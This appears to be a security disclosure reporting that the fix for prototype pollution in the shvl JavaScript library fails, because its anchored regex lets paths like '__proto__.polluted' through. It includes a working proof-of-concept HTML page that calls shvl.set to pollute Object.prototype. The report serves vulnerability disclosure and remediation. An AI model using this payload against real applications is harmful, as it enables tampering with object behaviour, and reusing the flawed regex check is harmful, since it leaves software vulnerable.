✍️ Description

Hi, I've seen a recent prototype pollution report to this library and, during the code review, found out that the applied fix doesn't work at all. The problem relies in the regex used to fix, as I shown bellow.

🕵️‍♂️ Proof of Concept

The reported prototype pollution resulted in the addition of the following regex to the source code:

!/^(__proto__|constructor|prototype)$/.test(path)

Which prevents anyone to use the exactly words __proto__, constructor or prototype as the entire path. But, since when someone is trying to pollute some attribute they need to define the attribute to be polluted, such as __proto__.polluted the presence of $ in the regex leads this fix to fail and keep shvl still vulnerable to prototype pollution. So, the payload from the las report still works as reported, this is my poc:

<!DOCTYPE html>
<html lang="en">
  <head>

    <title>poc</title>

    <script src="https://unpkg.com/shvl@latest/dist/shvl.umd.js"></script>
  </head>
    <script>
          quote = {}
          o = {}
          shvl.set(quote, "__proto__.polluted", "oi");
          
          if (o.polluted)
            console.log("is polluted!")
          else 
            console.log("is safe!")
    </script>
  </body>
</html>

💥 Impact

The impact of this vulnerability is that this library and everyone that use it remains vulnerable to prototype pollution as demonstrated in the last pwn2win 2021 challenge small-talk